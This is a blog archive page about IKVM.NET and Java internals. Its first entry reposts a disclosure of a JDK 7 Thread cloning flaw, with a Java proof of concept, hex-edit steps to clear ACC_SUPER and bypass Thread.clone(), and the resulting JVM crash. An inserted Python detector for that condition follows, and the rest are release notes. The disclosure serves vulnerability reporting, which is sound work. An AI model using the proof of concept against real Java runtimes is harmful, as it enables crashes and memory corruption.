# Thursday, 01 November 2012
JDK 7 Thread Cloning Vulnerability

This blog entry was originally posted on June 23, 2011, but was deleted as Oracle asked me to take it down while they investigate. After more than a year, the issue still has not been addressed, so I notified Oracle that I wanted to repost the blog entry and received no response. -- Jeroen

I warned on the mailing list when this came up, but apparently was ignored, so maybe a blog post will help.

In one of last year's updates of JDK 6 the cloning vulnerability was fixed in a hackish, but clever and safe way. Now in JDK 7 they try to fix it by overriding Object.clone() with a version that simply throws CloneNotSupportedException. The only problem is, in Java (and .NET too) overriding a method is not a safe way to make the base class method unavailable.

The (still) not so well known ACC_SUPER flag allows you (when it isn't set) to call arbitrary (accessible) methods in your super class hierarchy: with ACC_SUPER clear, invokespecial invokes exactly the method named in the constant pool instead of looking the method up starting from the direct superclass. So Thread.clone() can be skipped and Object.clone() can be called from any Thread subclass that doesn't have the ACC_SUPER flag set.

Here's an example:

```java
class Clone extends Thread implements Cloneable {
  public Object clone() {
    // javac compiles super.clone() as invokespecial java/lang/Object.clone().
    // With ACC_SUPER set the JVM starts the lookup at Thread and finds the
    // throwing override; with ACC_SUPER cleared Object.clone() runs directly.
    try { return super.clone(); }
    catch (CloneNotSupportedException _) { throw new Error(); }
  }
}

class Demo {
  public static void main(String[] args) throws Throwable {
    Clone c1 = new Clone() {
      public void run() {
        for (;;) {
        }
      }
    };
    c1.start();
    Thread t = (Thread)c1.clone();   // shallow copy of a running thread's fields
    c1.stop();
    c1.join();
    System.gc();
    t.stop();                         // the clone refers to native state that is gone
  }
}
```

Note that after you compile this with JDK 6 you'll need to edit the Clone.class to clear the ACC_SUPER flag. Use a hex editor to change the access_flags value 20 (hex) to 00, or download a copy here.

Now run it:

```text
C:\j>\jdk1.7-b145\bin\java Demo
#
# A fatal error has been detected by the Java Runtime Environment:
#
# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x000000006cd5af54, pid=3708, tid=10460
#
# JRE version: 7.0-b145
# Java VM: Java HotSpot(TM) 64-Bit Server VM (21.0-b15 mixed mode windows-amd64 compressed oops)
# Problematic frame:
# V [jvm.dll+0x1caf54]
#
# Failed to write core dump. Minidumps are not enabled by default on client versions of Windows
#
# An error report file with more information is saved as:
# C:\j\hs_err_pid3708.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.sun.com/bugreport/crash.jsp
#
```
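As an added example (not code from the original post), here is a small audit script that walks a class file's constant pool to reach access_flags and reports classes whose ACC_SUPER bit is clear, which is exactly what the hex edit above produces. The sample class bytes are constructed inline to mirror the Clone class and are not a real compiled class.

```python
import struct

ACC_SUPER = 0x0020      # when set, invokespecial starts its lookup at the direct superclass
ACC_INTERFACE = 0x0200  # interfaces never carry ACC_SUPER, so they are not findings
MAGIC = b"\xca\xfe\xba\xbe"

def parse_class_header(data):
    """Walk the constant pool so we can locate access_flags, this_class and super_class."""
    if data[:4] != MAGIC:
        raise ValueError("not a class file")
    off = 8                                        # skip magic, minor_version, major_version
    count = struct.unpack_from(">H", data, off)[0]; off += 2
    pool = [None] * count
    i = 1
    while i < count:
        tag = data[off]; off += 1
        if tag == 1:                               # CONSTANT_Utf8: u2 length + bytes
            ln = struct.unpack_from(">H", data, off)[0]; off += 2
            pool[i] = data[off:off + ln].decode("utf-8", "replace"); off += ln
        elif tag in (7, 8, 16, 19, 20):            # Class/String/MethodType/Module/Package: one u2 index
            pool[i] = struct.unpack_from(">H", data, off)[0]; off += 2
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18): # Integer/Float and the u2+u2 reference entries
            off += 4
        elif tag in (5, 6):                        # Long/Double: 8 bytes and two pool slots
            off += 8; i += 1
        elif tag == 15:                            # MethodHandle: u1 kind + u2 index
            off += 3
        else:
            raise ValueError("unknown constant pool tag %d at offset %d" % (tag, off - 1))
        i += 1
    flags, this_idx, super_idx = struct.unpack_from(">HHH", data, off)
    this_name = pool[pool[this_idx]]
    super_name = pool[pool[super_idx]] if super_idx else None   # java/lang/Object has super_class 0
    return flags, this_name, super_name

def lacks_acc_super(data):
    """True for a class (not an interface) whose ACC_SUPER bit is clear, as after the hex edit."""
    flags, _, _ = parse_class_header(data)
    return not (flags & ACC_INTERFACE) and not (flags & ACC_SUPER)

def build_sample_class(access_flags):
    """Constructed minimal class file for 'class Clone extends Thread' with no members (test input)."""
    cp = bytes([7]) + struct.pack(">H", 2)                          # #1 Class -> #2
    cp += bytes([1]) + struct.pack(">H", 5) + b"Clone"              # #2 Utf8
    cp += bytes([7]) + struct.pack(">H", 4)                         # #3 Class -> #4
    cp += bytes([1]) + struct.pack(">H", 16) + b"java/lang/Thread"  # #4 Utf8
    return (MAGIC + struct.pack(">HHH", 0, 50, 5) + cp              # version 50.0 (JDK 6), cp count 5
            + struct.pack(">HHH", access_flags, 1, 3)               # access_flags, this_class, super_class
            + struct.pack(">HHHH", 0, 0, 0, 0))                     # no interfaces, fields, methods, attributes
```

Run `lacks_acc_super(open(path, "rb").read())` over the class files in a build output to spot the condition; javac always sets ACC_SUPER, so a clear bit on a class means the file was produced or modified by something else.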

Thursday, 01 November 2012 16:11:20 (W. Europe Standard Time, UTC+01:00)
# Wednesday, 31 October 2012
IKVM.NET 7.2 Release Candidate 4

Yet another release candidate.

Changes (relative to rc 3):

  • Updated version to 7.2.4630.4
  • Added (optional) support for building without System.Core.dll dependency.
  • Bug fix. Generate override stubs for unsupported abstract generic methods. Fix for #3579785.
  • Bug fix. Handle incomplete interface mappings. Fix for bug #3581564.
  • Bug fix. Verifier should not merge state from instruction following exception block to handler. Fix for bug #3580611.

Binaries available here: ikvmbin-7.2.4630.4.zip

Sources: ikvmsrc-7.2.4630.4.zip, openjdk-7u6-b24-stripped.zip

Wednesday, 31 October 2012 13:50:31 (W. Europe Standard Time, UTC+01:00)
# Tuesday, 23 October 2012
IKVM.NET 7.2 Release Candidate 3

The stream of release candidates seems to never end, but I really wanted to include the fix for bug #3575555. I also included some other low-risk fixes.

Changes (relative to rc 2):

  • Updated version to 7.2.4630.3
  • Bug fix. Off-by-one error in JNI local ref index reusing. Fix for bug #3575555.
  • Bug fix. Don't try to inject DynamicMethod in array types (applies to array.clone() method for MethodHandles).
  • IKVM.Reflection: Bug fix. ModuleReader.ResolveMember() should support types. Thanks to Jb Evain for finding this.
  • IKVM.Reflection: Bug fix. While reading the Mono.Cecil source I realized that array bounds are signed.
  • IKVM.Reflection: Bug fix. LocalBuilder should extend LocalVariableInfo.
  • IKVM.Reflection: Implemented LocalVariableInfo.ToString().

Binaries available here: ikvmbin-7.2.4630.3.zip

Sources: ikvmsrc-7.2.4630.3.zip, openjdk-7u6-b24-stripped.zip

Tuesday, 23 October 2012 10:24:01 (W. Europe Daylight Time, UTC+02:00)
# Monday, 08 October 2012
IKVM.NET 7.2 Release Candidate 2

More bug fixes.

Changes (relative to rc 1):

  • Updated version to 7.2.4630.2
  • Bug fix. Class.forName("") should not throw System.ArgumentException.
  • Bug fix. Transient field modifier should be retained on literal fields.
  • Bug fix. Field.getModifiers() should only return the relevant modifiers.
  • IKVM.Reflection: Bug fix. Ignore unknown metadata streams.
  • IKVM.Reflection: Bug fix. Set AddressOfRawData in IMAGE_DEBUG_DIRECTORY.

Binaries available here: ikvmbin-7.2.4630.2.zip

Sources: ikvmsrc-7.2.4630.2.zip, openjdk-7u6-b24-stripped.zip

Monday, 08 October 2012 09:48:54 (W. Europe Daylight Time, UTC+02:00)
# Wednesday, 03 October 2012
IKVM.NET 0.46 Update 2 Release Candidate 1

I forgot to include the fix for transient constant static final fields in the previous release candidate and a new bug was reported in how IKVM.Reflection writes the debug PE header that causes problems with Visual Studio 2012's code coverage tools.

Changes (relative to 0.46 Update 2 rc 0):

  • Updated version to 0.46.0.4.
  • Fixed ikvmc to retain transient modifier on constant static final fields.
  • Fixed Field.getModifiers() to only return the relevant modifiers.
  • Fixed IKVM.Reflection to set AddressOfRawData in IMAGE_DEBUG_DIRECTORY.

Binaries available here: ikvmbin-0.46.0.4.zip

Sources: ikvmsrc-0.46.0.4.zip, openjdk6-b22-stripped.zip

Wednesday, 03 October 2012 08:26:59 (W. Europe Daylight Time, UTC+02:00)
# Thursday, 27 September 2012
Bye Bye ConstructorBuilder

System.Reflection.Emit is a great .NET feature, especially if you consider that it shipped as part of .NET 1.0, but the design of System.Reflection.Emit leaves something to be desired.

One of the crazy features is ConstructorBuilder. On the System.Reflection side, ConstructorInfo isn't all that helpful, but it is not as actively harmful as ConstructorBuilder. The reason for this is that ConstructorInfo and MethodInfo both extend MethodBase, so most common APIs are available through MethodBase.

ConstructorBuilder and MethodBuilder share no common Builder base class (because they extend ConstructorInfo and MethodInfo), which causes a lot of code duplication and type testing/downcasting.

A long time ago I found out that you can mostly avoid ConstructorBuilder, since it is possible to use TypeBuilder.DefineMethod() to define constructors. Recently I finally got around to taking advantage of this and completely removing ConstructorBuilder from the IKVM.NET runtime and compiler.

The thing that pushed me over the edge was this experiment. In .NET 2.0 there is no ConstructorBuilder equivalent to MethodBuilder.CreateMethodBody(). So if I'm ever going to experiment with method level JIT it is nice to be able to use this more efficient method of installing the stub.

There is one problem with using MethodBuilder for constructors. If you define a custom attribute and want to apply that custom attribute while it is still unbaked, you need a ConstructorBuilder for the custom attribute constructor, because CustomAttributeBuilder requires it. Luckily, in dynamic mode IKVM doesn't need to do this and in static mode I use IKVM.Reflection so I added MethodInfo.__AsConstructorInfo() to wrap the MethodInfo in a ConstructorInfo.

I considered adding MethodInfo support to CustomAttributeBuilder, but that turned out to be much more complicated, so I went with the easy approach of reusing the existing wrapping strategy.

The result of this refactoring is the removal of a bunch of duplicate code and a lot of downcasting. It also saves a small bit of memory, because the ConstructorBuilder wrappers are not needed anymore.

Thursday, 27 September 2012 14:29:05 (W. Europe Daylight Time, UTC+02:00)
# Wednesday, 26 September 2012
IKVM.NET 0.46 Update 2 Release Candidate 0

The 0.46 version is the last version based on Java 6 and as mentioned previously would be supported longer than a typical release. Based on user feedback I decided to post an update that fixes a number of bugs that have been found since the previous release.

Changes (relative to 0.46 Update 1):

  • Updated version to 0.46.0.3.
  • Bug fix. java.lang.Package was not populated from manifest for ikvmc compiled assemblies.
  • Bug fix. When writing a direct ByteBuffer to a non-blocking socket and the write fails because there is no kernel buffer available, we should not advance the ByteBuffer position.
  • Bug fix. When adding certificates to virtual cacerts file make sure that the aliases are unique.
  • Bug fix. If a finally/fault handler contains reachable code before the handler's start index, the handler should branch to the handler start index.
  • Bug fix. After emitting a finally/fault handler block, we should emit the block leave stubs (even though you can't leave the block, they also emit the backward branch stubs).
  • Bug fix. If a Java class extends a remapped .NET type (cli.System.Object or cli.System.Exception), we should correctly report the base class.
  • Bug fix. If we encounter a jsr or ret instruction, we should throw a VerifyError (instead of NotImplementedException).
  • Bug fix. If an exception block ends with an astore, we need to propagate the local variable type after the astore to the exception handler.
  • Disable AppDomain.ProcessExit hook to run shutdown hooks when running on Mono to work around https://bugzilla.xamarin.com/show_bug.cgi?id=5650
  • Bug fix. Custom attribute properties that don't have a public getter and setter should not be exposed as annotation properties.
  • Bug fix. Non-public property getter/setter methods should be ignored when we create properties to hide properties inherited from shadow types. This fixes a build break with .NET 4.5 beta which introduces a protected setter for Exception.HResult.
  • Bug fix. The $Method inner class for delegates should also be loadable for generic delegates. Thanks to Michael Bayne for reporting this.
  • Bug fix. When constructing a generic class loader we can't use GetWrapperFromType() on the type arguments, because they might refer to a subtype that is currently being loaded.
  • Replaced non-ascii character (micro) with ascii 'u' in Win32PrintService.java.
  • IKVM.Reflection: Bug fix. Resource Directory Entries must be sorted and names are case-insensitive.

Binaries available here: ikvmbin-0.46.0.3.zip

Sources: ikvmsrc-0.46.0.3.zip, openjdk6-b22-stripped.zip

Wednesday, 26 September 2012 08:16:30 (W. Europe Daylight Time, UTC+02:00)
# Monday, 17 September 2012
IKVM.NET 7.2 Release Candidate 1

The previous release candidate had a regression that caused custom attributes specified in the remap xml file not to be applied. This caused the build to fail on .NET 4.0.

Changes (relative to rc 0):

  • Updated version to 7.2.4630.1
  • Fixed build number in CommonAssemblyInfo.cs.in.
  • Fixed .NET 4.0 build issues.
  • Fixed map.xml custom attribute application regression.
  • Updated HOWTO.

Binaries available here: ikvmbin-7.2.4630.1.zip

Sources: ikvmsrc-7.2.4630.1.zip, openjdk-7u6-b24-stripped.zip

Monday, 17 September 2012 13:39:29 (W. Europe Daylight Time, UTC+02:00)
# Tuesday, 04 September 2012
IKVM.NET 7.2 Release Candidate 0

The first release candidate is available. Compared with the development snapshot some minor improvements to the Object.getClass() and Class.getDeclaredField() intrinsics were made.

Changes (relative to IKVM.NET 7.1):

  • Integrated OpenJDK 7u6 b24.
  • Improved java.util.concurrent performance.
  • Removed org.omg.PortableInterceptor.UNKNOWN class, which is not part of [Open]JDK rt.jar.
  • Added ZipFile constructor that was added in Java 7.
  • Changed ikvmc to apply custom attribute annotations on annotation types to the corresponding custom attribute that is generated (and allow AttributeUsageAttribute to override the default AttributeUsageAttribute generated from the @Target annotation).
  • Added app.config files for executables to allow them to run on .NET 4.5 on Windows 8 without triggering the .NET 3.5 auto download.
  • Bug fixes.
  • Many IKVM.Reflection improvements.

Binaries available here: ikvmbin-7.2.4630.0.zip

Sources: ikvmsrc-7.2.4630.0.zip, openjdk-7u6-b24-stripped.zip

Tuesday, 04 September 2012 15:39:29 (W. Europe Daylight Time, UTC+02:00)
# Friday, 31 August 2012
New Development Snapshot

I've integrated OpenJDK 7u6. The 7u7 security update is not included (as IKVM.NET is not suitable for running untrusted Java code anyway).

One divergence from 7u6 of note is that the new string hashing (used to protect against DoS attacks by intentionally causing hash collisions) has not been implemented. Instead the .NET String.GetHashCode() method is used for the alternative hash code. If DoS protection is required, .NET 4.5 should be used and randomized string hashing should be enabled.

Next stop the release candidate.

Changes:

  • Merged OpenJDK 7u6 b24.
  • Add support for running with headless awt toolkit. Fix for #3552089.
  • Fix a ClassCastException in printerJob.defaultPage() if the default paper format is not a standard paper format. This can occur with label printers.
  • Stop using ConstructorBuilder (always use MethodBuilder).
  • Remove usage of AssemblyName.ReferenceMatchesDefinition() because it is broken on .NET and not implemented on Mono.
  • Apply custom attribute annotations on annotation types to the corresponding custom attribute that is generated (and allow AttributeUsageAttribute to override the default AttributeUsageAttribute generated from the @Target annotation).
  • Fixed InternalsVisibleToAttribute handling to take the public key into account as well.
  • Win32 print service fixes.
  • Optimized String.valueOf(char).
  • Add app.config files for executables to allow them to run on .NET 4.5 on Windows 8 without triggering the .NET 3.5 auto download.
  • Fix Window.setIconImages(). Now all images are used. Before only the first image was used.
  • Disallow Unsafe.getUnsafe() from being called via reflection (for JDK compatibility).
  • Merged in security manager check to Font.createFont(int, File) from OpenJDK.
  • IKVM.Reflection: Bug fix. When enumerating virtual methods, we should only skip actual base methods, not any method with the same signature.
  • IKVM.Reflection: Automatically add default constructor when necessary (using the same criteria as Ref.Emit).
  • IKVM.Reflection: Added API extension to wrap MethodInfo in a ConstructorInfo.

Binaries available here: ikvmbin-7.2.4626.zip

The stripped OpenJDK 7u6 b24 sources are available here: openjdk-7u6-b24-stripped.zip

Friday, 31 August 2012 13:43:50 (W. Europe Daylight Time, UTC+02:00)